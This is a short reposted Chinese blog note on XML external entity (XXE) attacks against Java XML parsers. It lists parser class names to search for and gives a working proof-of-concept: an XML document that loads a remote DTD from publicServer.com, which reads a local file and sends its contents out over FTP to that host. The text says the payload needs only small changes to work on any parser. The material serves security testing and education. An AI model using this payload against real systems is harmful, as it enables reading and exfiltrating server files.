【转】http://www.freebuf.com/articles/web/97833.html
1
2
3
4
5
6
7
|
//解析xml关键字:
DocumentBuilderFactory
DocumentHelper
SAXParserFactory
SAXBuilder
SAXReader
unmarshal
|
使用 FTP 协议,攻击者可以读取到任意长度的文件。
1
2
3
4
5
|
<?
xml
version
=
"1.0"
?><!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]><
data
>4</
data
>
|
文件位于:http://publicServer.com/parameterEntity_sendftp.dtd
1
2
3
|
<!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY % send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;
|
这种攻击需要配置 FTP 服务器。不过,这个 POC 代码只需要稍作调整即可用于任意的解析器上。
本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1944264 ,如需转载请自行联系原作者